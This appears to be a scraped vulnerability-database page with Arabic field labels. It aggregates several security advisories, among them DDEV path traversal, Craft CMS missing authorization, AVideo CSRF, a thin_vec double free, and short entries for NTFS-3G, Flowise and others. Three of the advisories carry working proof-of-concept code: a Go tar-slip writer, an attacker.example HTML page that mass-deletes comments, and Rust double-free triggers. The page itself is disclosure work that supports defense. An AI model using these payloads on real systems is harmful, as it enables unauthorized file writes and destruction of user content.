## Summary The DDEV local dev tool has unsanitized extraction in both `Untar()` and `Unzip()` functions in `pkg/archive/archive.go`. This flaw allows users to download and extract archives from remote sources without path validation. ## Vulnerable Code `pkg/archive/archive.go:235` (Untar): ```go fullPath := filepath.Join(dest, file.Name) // NO SANITIZATION ``` `pkg/archive/archive.go:342` (Unzip): ```go fullPath := filepath.Join(dest, file.Name) // NO SANITIZATION ``` Both functions create directories via `os.MkdirAll` and files via `os.Create` using the unsanitized path. ## Impact Local development tool that downloads and extracts archives from remote sources (add-ons, updates). Malicious archive → arbitrary file write on developer machine. ## Proof of Concept ```go package main // PoC: ddev/ddev CWE-22 — ZipSlip in tar archive extraction // Replicates the exact pattern from pkg/archive/archive.go:235 (Untar) // and pkg/archive/archive.go:342 (Unzip) — both use filepath.Join(dest, name) // without verifying the result stays under the destination directory. import ( "archive/tar" "bytes" "fmt" "io" "os" "path/filepath" ) // Vulnerable extraction — mirrors pkg/archive/archive.go:235 func untarVulnerable(dst string, r io.Reader) error { tr := tar.NewReader(r) for { header, err := tr.Next() if err == io.EOF { break } if err != nil { return err } // VULNERABLE: identical to archive.go:235 // fullPath := filepath.Join(dest, file.Name) fullPath := filepath.Join(dst, header.Name) switch header.Typeflag { case tar.TypeDir: os.MkdirAll(fullPath, 0755) case tar.TypeReg: os.MkdirAll(filepath.Dir(fullPath), 0755) f, _ := os.Create(fullPath) io.Copy(f, tr) f.Close() } } return nil } func main() { // Build malicious tar with traversal entry var buf bytes.Buffer tw := tar.NewWriter(&buf) payload := []byte("# PoC: ddev/ddev CWE-22 path traversal\n") tw.WriteHeader(&tar.Header{ Name: "../../../../../../tmp/ddev_cwe22_poc", Mode: 0644, Size: int64(len(payload)), }) tw.Write(payload) tw.Close() // Extract into temp directory extractDir, _ := os.MkdirTemp("", "ddev-poc-*") defer os.RemoveAll(extractDir) untarVulnerable(extractDir, &buf) // Verify escape escaped := "/tmp/ddev_cwe22_poc" if data, err := os.ReadFile(escaped); err == nil { fmt.Printf("[!!!] VULNERABLE — file written to: %s\n", escaped) fmt.Printf("[!!!] Content: %s", string(data)) os.Remove(escaped) } else { fmt.Println("[OK] Not vulnerable") } } ``` Output: ``` [!!!] VULNERABLE — file written to: /tmp/ddev_cwe22_poc [!!!] Content: # PoC: ddev/ddev CWE-22 path traversal ``` > **Note:** Both `Untar` (archive.go:235) and `Unzip` (archive.go:342) use the same `filepath.Join(dest, file.Name)` pattern without containment checks. This PoC demonstrates the tar path; the zip path is analogously exploitable. ## Suggested Fix Add path containment check in both Untar and Unzip functions. ## Credit Kai Aizen (SnailSploit) — Adversarial AI & Security Research
الإصدارات المتأثرة
< 1.25.2
نوع الثغرة
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
الوصف الكامل
## Summary The `actionSavePermissions()` endpoint allows a user with only `viewUsers` permission to remove arbitrary users from all user groups. While `_saveUserGroups()` enforces per-group authorization for additions, it performs no equivalent authorization check for removals, so submitting an empty `groups` value removes all existing group memberships. ## Affected Versions - Craft CMS 5.6.0 through 5.9.14 (latest release at time of report) - Regression introduced in 5.6.0 when the `viewUsers` permission was added - Prior to 5.6.0, `editedUser()` required `editUsers`, which implicitly protected this endpoint - Requires Pro edition or higher (the vulnerable code path is gated by `CmsEdition::Pro`) ## Vulnerability Details ### Root Cause This is a **regression** introduced in Craft CMS 5.6.0 when the `viewUsers` permission was added. Before that change, `editedUser()` required `editUsers` permission for accessing other users’ data, which implicitly protected `actionSavePermissions()`. After the change, `actionSavePermissions()` became reachable for users with read-only access to other users, but the underlying group-saving logic still lacked authorization for group removals. The vulnerability has two components: 1. **`actionSavePermissions()` reachable with read-only access**: The action only requires a control panel request and delegates to `editedUser()`, which now only checks `viewUsers` — a permission explicitly documented as "read-only access to user elements." 2. **Asymmetric authorization in `_saveUserGroups()`**: The method checks `assignUserGroup` permission only when **adding** a user to a new group. When the `groups` parameter is an empty string (resulting in an empty array), the loop is skipped entirely, no authorization checks are run, and all group memberships are removed. ### Prerequisites - Attacker has a control panel account with `accessCp` and `viewUsers` permissions only - Target user belongs to one or more user groups that grant additional permissions - Pro edition or higher ### Attack Steps 1. Attacker authenticates to the Control Panel 2. Attacker sends a POST request to `actions/users/save-permissions` with: - `userId` = target user's ID - `groups` = `` (empty string) 3. All group memberships for the target user are removed 4. All permissions inherited from those groups are immediately revoked ### Impact - **Privilege revocation**: An attacker can strip group-based permissions from arbitrary users, including accounts whose effective access derives from group membership - **Denial of access**: Users lose access to sections, volumes, and features that were granted through group membership - **Bypass of elevated session requirement**: Group removal does not trigger `requireElevatedSession()` (which is only triggered when new groups are added)
الإصدارات المتأثرة
5.6.0, 5.6.0.1, 5.6.0.2, 5.6.1, 5.6.10
نوع الثغرة
CWE-862 — Missing Authorization
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
## Summary `objects/commentDelete.json.php` is a state-mutating JSON endpoint that deletes comments but performs no CSRF validation. It does not call `forbidIfIsUntrustedRequest()`, does not verify a CSRF/global token, and does not check `Origin`/`Referer`. Because AVideo intentionally sets `session.cookie_samesite=None` (to support cross-origin embed players), a cross-site request from any attacker-controlled page automatically carries the victim's `PHPSESSID`. Any authenticated victim who has authority to delete one or more comments (site moderators, video owners, and comment authors) can be tricked into deleting comments en masse simply by visiting an attacker page. ## Details ### Vulnerable endpoint: `objects/commentDelete.json.php` ```php // objects/commentDelete.json.php:1-35 <?php header('Content-Type: application/json'); global $global, $config; if (!isset($global['systemRootPath'])) { require_once '../videos/configuration.php'; } require_once $global['systemRootPath'] . 'objects/comment.php'; $obj = new stdClass(); $obj->error = true; $obj->msg = ''; $obj->id = intval(@$_REQUEST['id']); // <-- GET or POST $obj->status = false; if (empty($obj->id)) { $obj->id = intval(@$_REQUEST['comments_id']); } if (empty($obj->id)) { $obj->msg = __("ID can not be empty"); die(_json_encode($obj)); } $objC = new Comment("", 0, $obj->id); $obj->videos_id = $objC->getVideos_id(); $obj->status = $objC->delete(); // <-- destructive action, no CSRF check ... ``` No `forbidIfIsUntrustedRequest()`, no `verifyToken()`, no token/nonce parameter, no `Origin`/`Referer` validation. The handler accepts `$_REQUEST`, so the request may be delivered as `GET` (e.g. via `<img src>`) or `POST` (e.g. via an auto-submitting form / `fetch`). ### Authorization inside `Comment::delete()` does not stop CSRF ```php // objects/comment.php:147-159 public function delete() { if (!self::userCanAdminComment($this->id)) { return false; } ... $sql = "DELETE FROM comments WHERE id = ?"; ... return sqlDAL::writeSql($sql, "i", [$this->id]); } // objects/comment.php:316-332 public static function userCanAdminComment($comments_id) { if (!User::isLogged()) { return false; } if (Permissions::canAdminComment()) { return true; } // site moderator $obj = new Comment("", 0, $comments_id); if ($obj->users_id == User::getId()) { return true; } // comment owner $video = new Video("", "", $obj->videos_id); if ($video->getUsers_id() == User::getId()) { return true; } // video owner return false; } ``` This check is exactly what CSRF abuses: it asks "is the session user allowed to delete this comment?" In a CSRF attack, the session user is the victim, and yes — the victim is allowed. So the check grants the request. ### Site-wide cookie policy makes cross-site delivery reliable ```php // objects/include_config.php:139-146 if ($isHTTPS) { // SameSite=None is intentional: AVideo supports cross-origin iframe embedding // where users must stay authenticated (e.g. video players on third-party sites). // Setting Lax would break that use case. All state-mutating endpoints that are // vulnerable to CSRF must instead enforce a short-lived globalToken (verifyToken). ini_set('session.cookie_samesite', 'None'); ini_set('session.cookie_secure', '1'); } ``` The in-source comment is explicit: because AVideo intentionally opts out of SameSite protection, every state-mutating endpoint is responsible for its own CSRF defense. `commentDelete.json.php` forgets to apply it. The canonical example that does get it right is `objects/userUpdate.json.php:18`: ```php // objects/userUpdate.json.php:13-18 if (!User::isLogged()) { $obj->msg = __("Is not logged"); die(json_encode($obj)); } forbidIfIsUntrustedRequest(); // <-- what commentDelete.json.php is missing ``` A repository-wide grep for `forbidIfIsUntrustedRequest` yields only `objects/userUpdate.json.php` and the function definition itself — no shared middleware exists, and no bootstrap in `configuration.php` / `include_config.php` wraps endpoints with a CSRF check. ### Attacker model / victim value - **Site moderators** (any account with `Permissions::canAdminComment()`): full-site comment deletion oracle. - **Video creators** (channel owners): deletion oracle for every comment on their own videos. - **Comment authors**: only their own comments (self-DoS, low value). The first two classes make this a real integrity/availability attack on community content. ## PoC Assume the target AVideo instance runs at `https://victim.example.com` and the victim is a logged-in moderator (or any video owner). The attacker hosts: ```html <!-- https://attacker.example/mass-delete.html --> <!doctype html> <html><body> <h1>Cute kittens</h1> <!-- GET variant (works because the endpoint uses $_REQUEST): --> <img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=1" style="display:none"> <img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=2" style="display:none"> <img src="https://victim.example.com/objects/commentDelete.json.php?comments_id=3" style="display:none"> <!-- ... up to N --> <!-- POST variant (same result, reaches the POST code path the legit UI uses): --> <script> for (let i = 1; i <= 10000; i++) { fetch("https://victim.example.com/objects/commentDelete.json.php", { method: "POST", credentials: "include", headers: {"Content-Type": "application/x-www-form-urlencoded"}, body: "comments_id=" + i }); } </script> </body></html> ``` Manual verification of the server-side handler with the victim's own cookie (demonstrates that the endpoint itself performs the delete with no token): ```bash # 1. Log in as a moderator and capture PHPSESSID curl -c cookies.txt -d 'user=moderator&pass=pass' \ https://victim.example.com/objects/userLogin.json.php # 2. Call the endpoint with nothing but the session cookie and a comments_id. # No CSRF token, no Referer/Origin matching the site. curl -b cookies.txt \ -H 'Origin: https://attacker.example' \ -H 'Referer: https://attacker.example/mass-delete.html' \ 'https://victim.example.com/objects/commentDelete.json.php?comments_id=1' # -> {"error":false,"msg":"","id":1,"status":true,"videos_id":...} ``` The `{"status":true,"error":false}` response confirms the row was deleted; compare with `objects/userUpdate.json.php` under the same Origin/Referer, which returns the "Invalid Request" forbidden page from `forbidIfIsUntrustedRequest()`. ## Impact - Cross-site mass deletion of comments. - Against a site moderator (`Permissions::canAdminComment()`), the attacker can permanently delete every comment on the platform — a severe content-integrity and availability hit on the community layer. - Against any channel owner, the attacker can wipe all discussion under that creator's videos, a targeted reputation / engagement attack (e.g., silence dissent, silence evidence of prior posts). - The attack only requires luring a logged-in victim to any page that can fetch/embed/submit — a forum post, a compromised ad, a link in email, a rogue embed. - No credential compromise is required; the attack does not leak data, but it destroys it. - Because SameSite=None is a deliberate, documented product decision, browser-side defenses do not intervene. ## Recommended Fix Apply the project's own prescribed CSRF pattern to the handler. Two layers are appropriate: 1. Require an authenticated session and reject untrusted-origin requests (same treatment as `userUpdate.json.php`). 2. Restrict the method to `POST` so drive-by `<img>` and navigational `GET` deliveries cannot reach the sink. ```php // objects/commentDelete.json.php <?php header('Content-Type: application/json'); global $global, $config; if (!isset($global['systemRootPath'])) { require_once '../videos/configuration.php'; } require_once $global['systemRootPath'] . 'objects/comment.php'; // --- added CSRF defense --- if (!User::isLogged()) { die(_json_encode((object)['error' => true, 'msg' => __('Is not logged')])); } forbidIfIsUntrustedRequest(); // Referer/Origin gate if ($_SERVER['REQUEST_METHOD'] !== 'POST') { // no $_REQUEST drive-by die(_json_encode((object)['error' => true, 'msg' => 'POST required'])); } // --- end added --- $obj = new stdClass(); $obj->error = true; $obj->msg = ''; $obj->id = intval(@$_POST['id']); $obj->status = false; if (empty($obj->id)) { $obj->id = intval(@$_POST['comments_id']); } ... ``` Stronger (recommended): also require a short-lived global token via `verifyToken()` as the in-source comment in `objects/include_config.php` prescribes, and audit every other `objects/*.json.php` handler that performs a write — the same omission likely affects additional endpoints and should be handled project-wide, ideally through a shared bootstrap that enforces `forbidIfIsUntrustedRequest()` for any `json.php` that mutates state.
الإصدارات المتأثرة
29.0
نوع الثغرة
CWE-352 — CSRF
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
الوصف الكامل
In NTFS-3G 2022.10.3 before 2026.2.25, a heap buffer overflow exists in ntfs_build_permissions_posix() in acls.c that allows an attacker to corrupt heap memory in the SUID-root ntfs-3g binary by crafting a malicious NTFS image. The overflow is triggered on the READ path (stat, readdir, open) when processing a security descriptor with multiple ACCESS_DENIED ACEs containing WRITE_OWNER from distinct group SIDs.
نوع الثغرة
CWE-122 — CWE-122
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
المراجع
https://github.com/tuxera/ntfs-3g/releases/tag/2026.2.25
https://github.com/tuxera/ntfs-3g/security/advisories/GHSA-4cwv-5285-63v9
https://www.openwall.com/lists/oss-security/2026/04/21/4
http://www.openwall.com/lists/oss-security/2026/04/21/4
https://lists.debian.org/debian-lts-announce/2026/04/msg00024.html
الوصف الكامل
follow-redirects is an open source, drop-in replacement for Node's `http` and `https` modules that automatically follows redirects. Prior to 1.16.0, when an HTTP request follows a cross-domain redirect (301/302/307/308), follow-redirects only strips authorization, proxy-authorization, and cookie headers (matched by regex at index.js). Any custom authentication header (e.g., X-API-Key, X-Auth-Token, Api-Key, Token) is forwarded verbatim to the redirect target. This vulnerability is fixed in 1.16.0.
الإصدارات المتأثرة
1.16.0
نوع الثغرة
CWE-200 — Info Disclosure
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
الوصف الكامل
FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.215, the reply and draft flows trust client-supplied encrypted attachment IDs. Any IDs present in `attachments_all[]` but omitted from retained lists are decrypted and passed directly to `Attachment::deleteByIds()`. Because `load_attachments` returns encrypted IDs for attachments on a visible conversation, a mailbox peer can replay those IDs through `save_draft` and delete the original attachment row and file. Version 1.8.215 fixes the vulnerability.
نوع الثغرة
CWE-862 — Missing Authorization
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
الوصف الكامل
CrowdStrike has released security updates to address a critical unauthenticated path traversal vulnerability (CVE-2026-40050) in LogScale. This vulnerability only requires mitigation by customers that host specific versions of LogScale and does not affect Next-Gen SIEM customers. The vulnerability exists in a specific cluster API endpoint that, if exposed, allows a remote attacker to read arbitrary files from the server filesystem without authentication. Next-Gen SIEM customers are not affected and do not need to take any action. CrowdStrike mitigated the vulnerability for LogScale SaaS customers by deploying network-layer blocks to all clusters on April 7, 2026. We have proactively reviewed all log data and there is no evidence of exploitation. LogScale Self-hosted customers should upgrade to a patched version immediately to remediate the vulnerability. CrowdStrike identified this vulnerability during continuous and ongoing product testing.
نوع الثغرة
CWE-22 — Path Traversal
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الوصف الكامل
Vexa is an open-source, self-hostable meeting bot API and meeting transcription API. Prior to 0.10.0-260419-1910, the Vexa transcription-collector service exposes an internal endpoint `GET /internal/transcripts/{meeting_id}` that returns transcript data for any meeting without any authentication or authorization checks. An unauthenticated attacker can enumerate all meeting IDs, access any user's meeting transcripts without credentials, and steal confidential business conversations, passwords, and/or PII. Version 0.10.0-260419-1910 patches the issue.
الإصدارات المتأثرة
All versions < 0.10
نوع الثغرة
CWE-306 — Auth Bypass
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
الوصف الكامل
OS Command Injection Remote Code Execution Vulnerability in UI in Progress ADC Products allows an authenticated attacker with “All” permissions to execute arbitrary commands on the LoadMaster appliance by exploiting unsanitized input in a custom WAF rule file during the file upload process.
نوع الثغرة
CWE-77 — Command Injection
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
الوصف الكامل
### Summary A **Double Free / Use-After-Free (UAF)** vulnerability has been identified in the `IntoIter::drop` and `ThinVec::clear` implementations of the `thin_vec` crate. Both vulnerabilities share the same root cause and can trigger memory corruption using only safe Rust code — no `unsafe` blocks required. Undefined Behavior has been confirmed via **Miri** and **AddressSanitizer (ASAN)**. --- ### Details Both vulnerabilities share the same root cause. When a **panic occurs** during sequential element deallocation, the subsequent length cleanup code (`set_len(0)`) is never executed. During stack unwinding, the container is dropped again, causing already-freed memory to be re-freed (Double Free / UAF). #### Vulnerability 1 — `IntoIter::drop` **Location:** `thin-vec/src/lib.rs` L.2308~2314 `IntoIter::drop` transfers ownership of the internal buffer via `mem::replace`, then sequentially frees elements via `ptr::drop_in_place`. If a panic occurs during element deallocation, `set_len_non_singleton(0)` is never reached. During unwinding, `vec` is dropped again, re-freeing already-freed elements. The standard library's `std::vec::IntoIter` prevents this with a **DropGuard pattern**, but thin-vec lacks this defense. ```rust // Problematic structure (conceptual representation) impl<T> Drop for IntoIter<T> { fn drop(&mut self) { let mut vec = mem::replace(&mut self.vec, ThinVec::new()); unsafe { ptr::drop_in_place(vec.remaining_slice_mut()); // ← panic may occur here vec.set_len_non_singleton(0); // ← unreachable on panic } // During unwinding, vec is dropped again → Double Free } } ``` #### Vulnerability 2 — `ThinVec::clear` `clear()` calls `ptr::drop_in_place(&mut self[..])` followed by `self.set_len(0)` to reset the length. If a panic occurs during element deallocation, `set_len(0)` is never executed. When the `ThinVec` itself is subsequently dropped, already-freed elements are freed again. ```rust // Problematic structure (conceptual representation) pub fn clear(&mut self) { unsafe { ptr::drop_in_place(&mut self[..]); // ← panic may occur here self.set_len(0); // ← unreachable on panic } // ThinVec drop later → Double Free } ``` #### Recommended Fix Both vulnerabilities can be resolved with the same pattern: - **DropGuard pattern:** Insert an RAII guard before `drop_in_place` to guarantee `set_len(0)` is called regardless of panic - **Pre-zeroing approach:** Set the length to 0 before calling `drop_in_place` --- ### PoC **Requirements:** Rust nightly toolchain, `thin-vec = "0.2.14"` ```bash # Miri cargo +nightly miri run # ASAN RUSTFLAGS="-Z sanitizer=address" cargo +nightly run --release ``` #### PoC-1: `IntoIter::drop` ```rust use thin_vec::ThinVec; struct PanicBomb(String); impl Drop for PanicBomb { fn drop(&mut self) { if self.0 == "panic" { panic!("panic!"); } println!("Dropping: {}", self.0); } } fn main() { let mut v = ThinVec::new(); v.push(PanicBomb(String::from("normal1"))); v.push(PanicBomb(String::from("panic"))); // trigger element v.push(PanicBomb(String::from("normal2"))); let mut iter = v.into_iter(); iter.next(); // When iter is dropped: panic occurs at "panic" element // → During unwinding, Double Drop is triggered on "normal1" (already freed) } ``` **Miri output:** ``` error: Undefined Behavior: pointer not dereferenceable: alloc227 has been freed, so this pointer is dangling stack backtrace: 3: <PanicBomb as Drop>::drop ← Double Drop entry 6: <ThinVec<T> as Drop>::drop::drop_non_singleton 9: <IntoIter<T> as Drop>::drop::drop_non_singleton ← lib.rs:2310 (root cause) ``` **ASAN output:** ``` ==66150==ERROR: AddressSanitizer: heap-use-after-free on address 0x7afa685e0010 READ of size 7 at 0x7afa685e0010 #0 memcpy #4 drop_in_place::<PanicBomb> ← Double Drop entry point #5 <ThinVec as Drop>::drop::drop_non_singleton #6 <IntoIter as Drop>::drop::drop_non_singleton ``` #### PoC-2: `ThinVec::clear` ```rust use thin_vec::ThinVec; use std::panic; struct Poison(Box<usize>, &'static str); impl Drop for Poison { fn drop(&mut self) { if self.1 == "panic" { panic!("panic!"); } println!("Dropping: {}", self.0); } } fn main() { let mut v = ThinVec::new(); v.push(Poison(Box::new(1), "normal1")); // index 0 v.push(Poison(Box::new(2), "panic")); // index 1 → panic triggered here v.push(Poison(Box::new(3), "normal2")); // index 2 let _ = panic::catch_unwind(panic::AssertUnwindSafe(|| { v.clear(); // panic occurs at "panic" element during clear() // → set_len(0) is never called // → already-freed elements are re-freed when v goes out of scope })); } ``` --- ### Impact **Vulnerability classification:** - CWE-415: Double Free - CWE-416: Use-After-Free **Affected code:** All code satisfying the following conditions simultaneously: 1. `ThinVec` stores heap-owning types (`String`, `Vec`, `Box`, etc.) 2. (Vulnerability 1) An iterator is created via `into_iter()` and dropped before being fully consumed, or (Vulnerability 2) `clear()` is called while a remaining element's `Drop` implementation can panic 3. The `Drop` implementation of a remaining element triggers a panic Additionally, when combined with `Box<dyn Trait>` types, an exploit primitive enabling Arbitrary Code Execution (ACE) via heap spray and vtable hijacking has been confirmed. If the freed fat pointer slot (16 bytes) at the point of Double Drop is reclaimed by an attacker-controlled fake vtable, subsequent Drop calls can be redirected to attacker-controlled code.
الإصدارات المتأثرة
All versions < 0.2.16
نوع الثغرة
CWE-415 — CWE-415
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
الوصف الكامل
A vulnerability was found in Tenda F451 1.0.0.7_cn_svn7958. This issue affects the function fromGstDhcpSetSer of the file /goform/GstDhcpSetSer of the component httpd. Performing a manipulation of the argument dips results in buffer overflow. The attack may be initiated remotely. The exploit has been made public and could be used.
نوع الثغرة
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
الوصف الكامل
### Summary The text-to-speech generation endpoint (`POST /api/v1/text-to-speech/generate`) is whitelisted (no auth) and accepts a `credentialId` directly in the request body. When called without a `chatflowId`, the endpoint uses the provided `credentialId` to decrypt the stored credential (e.g., OpenAI or ElevenLabs API key) and generate speech. ### Root Cause ```typescript // packages/server/src/controllers/text-to-speech/index.ts:58-64 } else { // Use TTS config from request body provider = bodyProvider credentialId = bodyCredentialId // ← attacker-controlled credential ID voice = bodyVoice model = bodyModel } ``` ### Docker Validation `POST /api/v1/text-to-speech/generate` with arbitrary `credentialId` in body: endpoint processes request, sends SSE `tts_start` event, only fails when credential doesn't exist — proves code path runs without authentication. ### Impact - Use victim's API keys (OpenAI, ElevenLabs, Azure, Google) without authorization - Burn API credits on the victim's account - Generate unlimited speech content at victim's expense - Combined with credential ID leak from Finding 2, this is trivially exploitable ### Suggested Fix Remove the TTS endpoint from `WHITELIST_URLS` or validate that the credential belongs to the chatflow being used: ```typescript // Only allow credentialId when it matches the chatflow's TTS configuration if (!chatflowId) { return res.status(401).json({ message: 'Authentication required' }) } ``` --- ## References - `packages/server/src/controllers/text-to-speech/index.ts` lines 10-162 - `packages/server/src/utils/constants.ts` line 41 (whitelist entry) ## Credits - Shinobi Security - https://github.com/shinobisecurity
الإصدارات المتأثرة
All versions < 3.1.0
CVSS Vector
CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
الوصف الكامل
A security vulnerability has been detected in libvips up to 8.18.2. The affected element is the function im_minpos_vec of the file libvips/deprecated/vips7compat.c of the component nip2 Handler. Such manipulation of the argument n leads to heap-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed publicly and may be used. The vendor confirms that they will "be removing the deprecated area in libvips 8.19".
نوع الثغرة
CWE-119 — Buffer Overflow
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
المراجع
https://github.com/libvips/libvips/
https://github.com/libvips/libvips/issues/4965
https://github.com/libvips/libvips/issues/4965#issuecomment-4135003499
https://vuldb.com/submit/786994
https://vuldb.com/vuln/358035
https://vuldb.com/vuln/358035/cti